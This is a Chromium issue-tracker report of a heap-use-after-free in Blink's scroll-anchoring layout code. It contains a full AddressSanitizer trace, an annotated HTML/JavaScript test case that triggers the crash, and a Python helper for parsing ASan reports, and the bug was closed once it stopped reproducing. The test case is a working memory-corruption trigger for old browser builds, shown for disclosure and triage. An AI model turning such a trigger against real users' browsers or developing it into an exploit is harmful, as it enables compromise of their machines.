
Issue 652105

Issue metadata

Status: WontFix
Owner: ----
Closed: Oct 2016
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security


Security: heap-use-after-free in blink::LayoutObject::maybeClearIsScrollAnchorObject

Reported by cloudfuz...@gmail.com, Oct 2 2016

Issue description

VULNERABILITY DETAILS
The testcase crashes the latest ASAN build of Chrome as follows:

=================================================================
==2999==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000043600 at pc 0x55a1c1b6d2eb bp 0x7ffdce425630 sp 0x7ffdce425628
READ of size 7 at 0x611000043600 thread T0 (chrome)
    #0 0x55a1c1b6d2ea in isScrollAnchorObject third_party/WebKit/Source/core/layout/LayoutObject.h:1853:9
    #1 0x55a1c1b6d2ea in blink::LayoutObject::maybeClearIsScrollAnchorObject() third_party/WebKit/Source/core/layout/LayoutObject.cpp:2510
    #2 0x55a1c0de4d45 in blink::RootFrameViewport::setLayoutViewport(blink::ScrollableArea&) third_party/WebKit/Source/core/frame/RootFrameViewport.cpp:25:43
    #3 0x55a1c20b3653 in blink::TopDocumentRootScrollerController::recomputeGlobalRootScroller() third_party/WebKit/Source/core/page/scrolling/TopDocumentRootScrollerController.cpp:115:28
    #4 0x55a1c0d0371d in blink::FrameView::layout() third_party/WebKit/Source/core/frame/FrameView.cpp:1126:25
    #5 0x55a1c05217da in blink::Document::implicitClose() third_party/WebKit/Source/core/dom/Document.cpp:2690:21
    #6 0x55a1c1f2640c in blink::FrameLoader::checkCompleted() third_party/WebKit/Source/core/loader/FrameLoader.cpp:638:30
    #7 0x55a1c1f25e46 in blink::FrameLoader::finishedParsing() third_party/WebKit/Source/core/loader/FrameLoader.cpp:556:5
    #8 0x55a1c0556638 in blink::Document::finishedParsing() third_party/WebKit/Source/core/dom/Document.cpp:4863:25
    #9 0x55a1c12c57bc in end third_party/WebKit/Source/core/html/parser/HTMLDocumentParser.cpp:867:20
    #10 0x55a1c12c57bc in attemptToRunDeferredScriptsAndEnd third_party/WebKit/Source/core/html/parser/HTMLDocumentParser.cpp:880
    #11 0x55a1c12c57bc in blink::HTMLDocumentParser::prepareToStopParsing() third_party/WebKit/Source/core/html/parser/HTMLDocumentParser.cpp:235
    #12 0x55a1c12d010e in blink::HTMLDocumentParser::processTokenizedChunkFromBackgroundParser(std::__1::unique_ptr<blink::HTMLDocumentParser::TokenizedChunk, std::__1::default_delete<blink::HTMLDocumentParser::TokenizedChunk> >) third_party/WebKit/Source/core/html/parser/HTMLDocumentParser.cpp:497:17
    #13 0x55a1c12c7c64 in blink::HTMLDocumentParser::pumpPendingSpeculations() third_party/WebKit/Source/core/html/parser/HTMLDocumentParser.cpp:575:36
    #14 0x55a1beffc341 in Invoke<std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> > > base/bind_internal.h:164:12
    #15 0x55a1beffc341 in MakeItSo<void (*const &)(std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> >), std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> > > base/bind_internal.h:285
    #16 0x55a1beffc341 in RunImpl<void (*const &)(std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> >), const std::__1::tuple<base::internal::PassedWrapper<std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> > > > &, 0> base/bind_internal.h:361
    #17 0x55a1beffc341 in base::internal::Invoker<base::internal::BindState<void (*)(std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> >), base::internal::PassedWrapper<std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> > > >, void ()>::Run(base::internal::BindStateBase*) base/bind_internal.h:339
    #18 0x55a1b6e74f7c in Run base/callback.h:64:12
    #19 0x55a1b6e74f7c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
    #20 0x55a1bf03f0d2 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue(blink::scheduler::internal::WorkQueue*) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:344:19
    #21 0x55a1bf039f39 in blink::scheduler::TaskQueueManager::DoWork(base::TimeTicks, bool) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:240:13
    #22 0x55a1b6e74f7c in Run base/callback.h:64:12
    #23 0x55a1b6e74f7c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
    #24 0x55a1b6c89097 in base::MessageLoop::RunTask(base::PendingTask const&) base/message_loop/message_loop.cc:405:19
    #25 0x55a1b6c89e1f in base::MessageLoop::DeferOrRunPendingTask(base::PendingTask) base/message_loop/message_loop.cc:414:5
    #26 0x55a1b6c8b3da in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:513:13
    #27 0x55a1b6c95a5d in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:35:31
    #28 0x55a1b6d14f44 in base::RunLoop::Run() base/run_loop.cc:35:10
    #29 0x55a1c3dc361d in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:198:23
    #30 0x55a1b5de08b1 in content::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) content/app/content_main_runner.cc:343:14
    #31 0x55a1b5de5116 in content::ContentMainRunnerImpl::Run() content/app/content_main_runner.cc:786:12
    #32 0x55a1b5ddf67d in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:20:28
    #33 0x55a1af860622 in ChromeMain chrome/app/chrome_main.cc:97:12
    #34 0x7f4e9db6882f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291

0x611000043600 is located 64 bytes inside of 240-byte region [0x6110000435c0,0x6110000436b0)
freed by thread T0 (chrome) here:
    #0 0x55a1af83456b in __interceptor_free (/home/nils/MonkeyChrome/OpRealEstate/asan-linux-release-422171/chrome+0x2f7d56b)
    #1 0x55a1c06c956b in blink::Node::detachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/Node.cpp:909:25
    #2 0x55a1c047399e in blink::ContainerNode::detachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/ContainerNode.cpp:738:11
    #3 0x55a1c05de9bc in blink::Element::detachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/Element.cpp:1637:20
    #4 0x55a1c0473945 in blink::ContainerNode::detachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/ContainerNode.cpp:735:16
    #5 0x55a1c051a8d3 in blink::Document::shutdown() third_party/WebKit/Source/core/dom/Document.cpp:2233:20
    #6 0x55a1c1f2fe14 in blink::FrameLoader::prepareForCommit() third_party/WebKit/Source/core/loader/FrameLoader.cpp:1144:30
    #7 0x55a1c1f304b9 in blink::FrameLoader::commitProvisionalLoad() third_party/WebKit/Source/core/loader/FrameLoader.cpp:1161:10
    #8 0x55a1c1eccfa9 in commitIfReady third_party/WebKit/Source/core/loader/DocumentLoader.cpp:263:24
    #9 0x55a1c1eccfa9 in blink::DocumentLoader::processData(char const*, unsigned long) third_party/WebKit/Source/core/loader/DocumentLoader.cpp:548
    #10 0x55a1c1ecca58 in blink::DocumentLoader::dataReceived(blink::Resource*, char const*, unsigned long) third_party/WebKit/Source/core/loader/DocumentLoader.cpp:526:5
    #11 0x55a1c72f5a1d in blink::RawResource::appendData(char const*, unsigned long) third_party/WebKit/Source/core/fetch/RawResource.cpp:98:12
    #12 0x55a1c0c87b9e in blink::ResourceLoader::didReceiveData(blink::WebURLLoader*, char const*, int, int, int) third_party/WebKit/Source/core/fetch/ResourceLoader.cpp:171:17
    #13 0x55a1bebecb8e in content::WebURLLoaderImpl::Context::OnReceivedData(std::__1::unique_ptr<content::RequestPeer::ReceivedData, std::__1::default_delete<content::RequestPeer::ReceivedData> >) content/child/web_url_loader_impl.cc:773:14
    #14 0x55a1bebdf7ee in content::WebURLLoaderImpl::Context::HandleDataURL() content/child/web_url_loader_impl.cc:914:7
    #15 0x55a1b6e74f7c in Run base/callback.h:64:12
    #16 0x55a1b6e74f7c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
    #17 0x55a1bf03f0d2 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue(blink::scheduler::internal::WorkQueue*) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:344:19
    #18 0x55a1bf039f39 in blink::scheduler::TaskQueueManager::DoWork(base::TimeTicks, bool) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:240:13
    #19 0x55a1b6e74f7c in Run base/callback.h:64:12
    #20 0x55a1b6e74f7c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
    #21 0x55a1b6c89097 in base::MessageLoop::RunTask(base::PendingTask const&) base/message_loop/message_loop.cc:405:19
    #22 0x55a1b6c89e1f in base::MessageLoop::DeferOrRunPendingTask(base::PendingTask) base/message_loop/message_loop.cc:414:5
    #23 0x55a1b6c8b3da in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:513:13
    #24 0x55a1b6c95a5d in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:35:31
    #25 0x55a1b6d14f44 in base::RunLoop::Run() base/run_loop.cc:35:10
    #26 0x55a1c3dc361d in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:198:23
    #27 0x55a1b5de08b1 in content::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) content/app/content_main_runner.cc:343:14
    #28 0x55a1b5de5116 in content::ContentMainRunnerImpl::Run() content/app/content_main_runner.cc:786:12
    #29 0x55a1b5ddf67d in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:20:28
    #30 0x55a1af860622 in ChromeMain chrome/app/chrome_main.cc:97:12
    #31 0x7f4e9db6882f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291

previously allocated by thread T0 (chrome) here:
    #0 0x55a1af8348bc in __interceptor_malloc (/home/nils/MonkeyChrome/OpRealEstate/asan-linux-release-422171/chrome+0x2f7d8bc)
    #1 0x55a1c1b3dd35 in partitionAlloc third_party/WebKit/Source/wtf/allocator/PartitionAlloc.h:660:20
    #2 0x55a1c1b3dd35 in operator new third_party/WebKit/Source/core/layout/LayoutObject.cpp:149
    #3 0x55a1c1b3dd35 in blink::LayoutObject::createObject(blink::Element*, blink::ComputedStyle const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:190
    #4 0x55a1c0675ce1 in blink::LayoutTreeBuilderForElement::createLayoutObject() third_party/WebKit/Source/core/dom/LayoutTreeBuilder.cpp:121:45
    #5 0x55a1c05dcddc in createLayoutObjectIfNeeded third_party/WebKit/Source/core/dom/LayoutTreeBuilder.h:76:13
    #6 0x55a1c05dcddc in blink::Element::attachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/Element.cpp:1574
    #7 0x55a1c06c91a3 in blink::Node::reattachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/Node.cpp:887:5
    #8 0x55a1c05e2cde in buildLayoutTree third_party/WebKit/Source/core/dom/Element.cpp:1883:5
    #9 0x55a1c05e2cde in blink::Element::recalcOwnStyle(blink::StyleRecalcChange) third_party/WebKit/Source/core/dom/Element.cpp:1839
    #10 0x55a1c05e1a03 in blink::Element::recalcStyle(blink::StyleRecalcChange, blink::Text*) third_party/WebKit/Source/core/dom/Element.cpp:1754:22
    #11 0x55a1c0512c60 in blink::Document::updateStyle() third_party/WebKit/Source/core/dom/Document.cpp:1821:30
    #12 0x55a1c0501831 in blink::Document::updateStyleAndLayoutTree() third_party/WebKit/Source/core/dom/Document.cpp:1753:5
    #13 0x55a1c05160e5 in blink::Document::updateStyleAndLayoutTreeIgnorePendingStylesheets() third_party/WebKit/Source/core/dom/Document.cpp:1999:5
    #14 0x55a1c0514a22 in blink::Document::updateStyleAndLayoutIgnorePendingStylesheets(blink::Document::RunPostLayoutTasks) third_party/WebKit/Source/core/dom/Document.cpp:2004:5
    #15 0x55a1c0d96063 in blink::LocalDOMWindow::scrollBy(double, double, blink::ScrollBehavior) const third_party/WebKit/Source/core/frame/LocalDOMWindow.cpp:1083:17
    #16 0x55a1bf640819 in scrollBy2Method out/Release/gen/blink/bindings/core/v8/V8Window.cpp:5516:11
    #17 0x55a1bf640819 in scrollByMethod out/Release/gen/blink/bindings/core/v8/V8Window.cpp:5552
    #18 0x55a1bf640819 in blink::DOMWindowV8Internal::scrollByMethodCallback(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/gen/blink/bindings/core/v8/V8Window.cpp:5573
    #19 0x55a1b0707db3 in v8::internal::FunctionCallbackArguments::Call(void (*)(v8::FunctionCallbackInfo<v8::Value> const&)) v8/src/api-arguments.cc:19:3
    #20 0x55a1b09127c9 in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) v8/src/builtins/builtins-api.cc:106:36
    #21 0x55a1b090f5a8 in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) v8/src/builtins/builtins-api.cc:135:5
    #22 0x7f4d2ad043a6  (<unknown module>)
    #23 0x7f4d2ae09136  (<unknown module>)
    #24 0x7f4d2ae08935  (<unknown module>)
    #25 0x7f4d2ad4e062  (<unknown module>)
    #26 0x7f4d2ad2b980  (<unknown module>)
    #27 0x55a1b14fcb92 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>) v8/src/execution.cc:139:13
    #28 0x55a1b14fc2e7 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) v8/src/execution.cc:176:10
    #29 0x55a1b0774197 in v8::Function::Call(v8::Local<v8::Context>, v8::Local<v8::Value>, int, v8::Local<v8::Value>*) v8/src/api.cc:4899:7
    #30 0x55a1bf46674a in blink::V8ScriptRunner::callFunction(v8::Local<v8::Function>, blink::ExecutionContext*, v8::Local<v8::Value>, int, v8::Local<v8::Value>*, v8::Isolate*) third_party/WebKit/Source/bindings/core/v8/V8ScriptRunner.cpp:507:50
    #31 0x55a1c6e8d5a5 in blink::V8LazyEventListener::callListenerFunction(blink::ScriptState*, v8::Local<v8::Value>, blink::Event*) third_party/WebKit/Source/bindings/core/v8/V8LazyEventListener.cpp:101:10
    #32 0x55a1bf502322 in blink::V8AbstractEventListener::invokeEventHandler(blink::ScriptState*, blink::Event*, v8::Local<v8::Value>) third_party/WebKit/Source/bindings/core/v8/V8AbstractEventListener.cpp:130:23
    #33 0x55a1bf501de7 in blink::V8AbstractEventListener::handleEvent(blink::ScriptState*, blink::Event*) third_party/WebKit/Source/bindings/core/v8/V8AbstractEventListener.cpp:95:5
    #34 0x55a1bf5019b5 in blink::V8AbstractEventListener::handleEvent(blink::ExecutionContext*, blink::Event*) third_party/WebKit/Source/bindings/core/v8/V8AbstractEventListener.cpp:84:5
    #35 0x55a1c0bb072b in blink::EventTarget::fireEventListeners(blink::Event*, blink::EventTargetData*, blink::HeapVector<blink::RegisteredEventListener, 1ul>&) third_party/WebKit/Source/core/events/EventTarget.cpp:654:19

SUMMARY: AddressSanitizer: heap-use-after-free third_party/WebKit/Source/core/layout/LayoutObject.h:1853:9 in isScrollAnchorObject
Shadow bytes around the buggy address:
  0x0c2280000670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280000680: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c2280000690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800006a0: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
  0x0c22800006b0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c22800006c0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800006d0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa
  0x0c22800006e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800006f0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c2280000700: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c2280000710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==2999==ABORTING

VERSION
Chrome Version: asan-linux-release-422171

REPRODUCTION CASE
<script>
function start() {
  o0 = window.document;
  // Build a <frame> inside a <div> under the top document's root element.
  o52 = document.createElement('frame');
  o179 = document.createElement('div');
  document.documentElement.appendChild(o179);
  o179.appendChild(o52);
  // Move the top document's root element (and the subtree holding the frame)
  // into the frame's own document, replacing that document's root element.
  o52.contentDocument.replaceChild(o0.documentElement, o52.contentDocument.documentElement);
  // Append an extremely wide iframe loading a data: URL directly to the
  // top document, which no longer has a root element of its own.
  o2096 = document.createElement('iframe');
  o2096.src = 'data:text/html,blank';
  o2096.width = '2097137px';
  o2096.height = '1px';
  o0.appendChild(o2096);
  // Scrolling the first child frame forces a style and layout update; per the
  // allocation stack above (LocalDOMWindow::scrollBy -> ... ->
  // LayoutObject::createObject) this is where the LayoutObject is created.
  o3122 = frames[0];
  o3122.scrollBy(1048576, 64);
  // Per the free and use stacks above, the object is freed from
  // Document::shutdown when the data: URL commits (HandleDataURL ->
  // commitProvisionalLoad) and read again from the layout run under
  // Document::implicitClose.
  document.documentElement.style.zoom = '0.0001';
}
</script>
<body onload="start()"></body>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab

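What a reader wants from a report like the one above is the object's lifecycle: where it was allocated, where it was freed, and where it was touched afterwards, with the allocator and sanitizer frames stripped away. The following helper is an added example, not code from this issue, from Chromium or from ClusterFuzz. It parses the three ASan stacks, checks that the region arithmetic in the "is located ... bytes inside of" line is self-consistent, and picks the first frame under a project prefix (assumed here to be third_party/WebKit/) from each stack. Its input is a trimmed excerpt of the report in this issue, embedded inline so the script runs offline.

```python
"""Triage helper for an AddressSanitizer heap-use-after-free report.

Added example, not Chromium or ClusterFuzz code. Splits the report into the
access, free and allocation stacks, checks the region arithmetic and returns
the first project frame of each stack so the object's lifecycle reads at a glance.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: a trimmed excerpt of the report in this issue.
SAMPLE_REPORT = """\
==2999==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000043600 at pc 0x55a1c1b6d2eb bp 0x7ffdce425630 sp 0x7ffdce425628
READ of size 7 at 0x611000043600 thread T0 (chrome)
    #0 0x55a1c1b6d2ea in isScrollAnchorObject third_party/WebKit/Source/core/layout/LayoutObject.h:1853:9
    #1 0x55a1c1b6d2ea in blink::LayoutObject::maybeClearIsScrollAnchorObject() third_party/WebKit/Source/core/layout/LayoutObject.cpp:2510
    #2 0x55a1c0de4d45 in blink::RootFrameViewport::setLayoutViewport(blink::ScrollableArea&) third_party/WebKit/Source/core/frame/RootFrameViewport.cpp:25:43
    #3 0x55a1c20b3653 in blink::TopDocumentRootScrollerController::recomputeGlobalRootScroller() third_party/WebKit/Source/core/page/scrolling/TopDocumentRootScrollerController.cpp:115:28

0x611000043600 is located 64 bytes inside of 240-byte region [0x6110000435c0,0x6110000436b0)
freed by thread T0 (chrome) here:
    #0 0x55a1af83456b in __interceptor_free (/home/nils/MonkeyChrome/OpRealEstate/asan-linux-release-422171/chrome+0x2f7d56b)
    #1 0x55a1c06c956b in blink::Node::detachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/Node.cpp:909:25
    #5 0x55a1c051a8d3 in blink::Document::shutdown() third_party/WebKit/Source/core/dom/Document.cpp:2233:20

previously allocated by thread T0 (chrome) here:
    #0 0x55a1af8348bc in __interceptor_malloc (/home/nils/MonkeyChrome/OpRealEstate/asan-linux-release-422171/chrome+0x2f7d8bc)
    #1 0x55a1c1b3dd35 in partitionAlloc third_party/WebKit/Source/wtf/allocator/PartitionAlloc.h:660:20
    #2 0x55a1c1b3dd35 in operator new third_party/WebKit/Source/core/layout/LayoutObject.cpp:149
    #3 0x55a1c1b3dd35 in blink::LayoutObject::createObject(blink::Element*, blink::ComputedStyle const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:190
    #15 0x55a1c0d96063 in blink::LocalDOMWindow::scrollBy(double, double, blink::ScrollBehavior) const third_party/WebKit/Source/core/frame/LocalDOMWindow.cpp:1083:17
    #22 0x7f4d2ad043a6  (<unknown module>)

SUMMARY: AddressSanitizer: heap-use-after-free third_party/WebKit/Source/core/layout/LayoutObject.h:1853:9 in isScrollAnchorObject
"""

ERROR_RE = re.compile(r"^==\d+==ERROR: AddressSanitizer: (\S+) on address 0x([0-9a-f]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at 0x[0-9a-f]+ thread (T\d+)")
REGION_RE = re.compile(r"^0x[0-9a-f]+ is located (\d+) bytes inside of (\d+)-byte region "
                       r"\[0x([0-9a-f]+),0x([0-9a-f]+)\)")
FRAME_RE = re.compile(r"^\s*#(\d+) 0x([0-9a-f]+) (.*)$")
# Frames that say nothing about the object's owner: allocator entry points.
ALLOCATOR_NOISE = {"partitionAlloc", "operator new", "operator new[]"}


@dataclass
class Frame:
    index: int
    pc: int
    function: Optional[str]   # None for JIT frames printed as "(<unknown module>)"
    location: str


def parse_frame(line: str) -> Optional[Frame]:
    m = FRAME_RE.match(line)
    if not m:
        return None
    rest = m.group(3).strip()
    if not rest.startswith("in "):
        return Frame(int(m.group(1)), int(m.group(2), 16), None, rest)
    # Function names contain spaces (templates, "operator new"); the source
    # location is always the last whitespace-separated token.
    func, _, loc = rest[3:].rpartition(" ")
    return Frame(int(m.group(1)), int(m.group(2), 16), func, loc)


def parse_asan_report(text: str) -> Dict:
    report = {"kind": None, "address": None, "access": None, "size": None, "thread": None,
              "offset": None, "region_size": None, "region": None,
              "stacks": {"crash": [], "free": [], "alloc": []}}
    current = None
    for line in text.splitlines():
        if line.startswith("SUMMARY:"):
            break
        if (m := ERROR_RE.match(line)):
            report["kind"], report["address"] = m.group(1), int(m.group(2), 16)
            current = "crash"
        elif (m := ACCESS_RE.match(line)):
            report["access"], report["size"], report["thread"] = m.group(1), int(m.group(2)), m.group(3)
        elif (m := REGION_RE.match(line)):
            report["offset"], report["region_size"] = int(m.group(1)), int(m.group(2))
            report["region"] = (int(m.group(3), 16), int(m.group(4), 16))
        elif line.startswith("freed by"):
            current = "free"
        elif line.startswith("previously allocated by"):
            current = "alloc"
        elif current and (frame := parse_frame(line)):
            report["stacks"][current].append(frame)
    return report


def region_consistent(report: Dict) -> bool:
    """Cross-check the three numbers ASan prints about the freed region."""
    start, end = report["region"]
    return (end - start == report["region_size"]
            and report["address"] - start == report["offset"]
            and report["offset"] + report["size"] <= report["region_size"])


def first_project_frame(frames: List[Frame], prefix: str = "third_party/WebKit/") -> Optional[Frame]:
    for f in frames:
        if f.function is None or f.function.startswith("__interceptor_") or f.function in ALLOCATOR_NOISE:
            continue
        if f.location.startswith(prefix):
            return f
    return None


def lifecycle(report: Dict) -> Dict[str, Optional[Frame]]:
    return {name: first_project_frame(frames) for name, frames in report["stacks"].items()}


if __name__ == "__main__":
    r = parse_asan_report(SAMPLE_REPORT)
    print(f"{r['kind']}: {r['access']} of {r['size']} bytes at +{r['offset']} of {r['region_size']}-byte region,"
          f" region arithmetic consistent={region_consistent(r)}")
    for stage, frame in lifecycle(r).items():
        print(f"  {stage:>5}: #{frame.index} {frame.function}  {frame.location}")
```

Run against the full report on this page, the three project frames line up with the repro: allocation under LocalDOMWindow::scrollBy, free under Document::shutdown during the data: URL commit, and the stale read from LayoutObject::maybeClearIsScrollAnchorObject during the layout triggered by Document::implicitClose. The region check is worth keeping in any triage script: a report whose offset does not match its address and region start usually means two reports were interleaved or a line was truncated when it was pasted.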
Comment 1 by ClusterFuzz, Oct 3 2016

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5236585572597760

Hi cloudfuzzer, CF didn't reproduce your crash today. Can you please confirm that you are still seeing this with the latest trunk build? Thanks.

https://cluster-fuzz.appspot.com/testcase?key=5749933804355584 is a second upload just to be sure ...

Hi, I just tried with the latest build (asan-linux-release-422674) and it does not reproduce any more.

Status: WontFix (was: Unconfirmed)

Comment 6 by sheriffbot@chromium.org, Jan 12 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot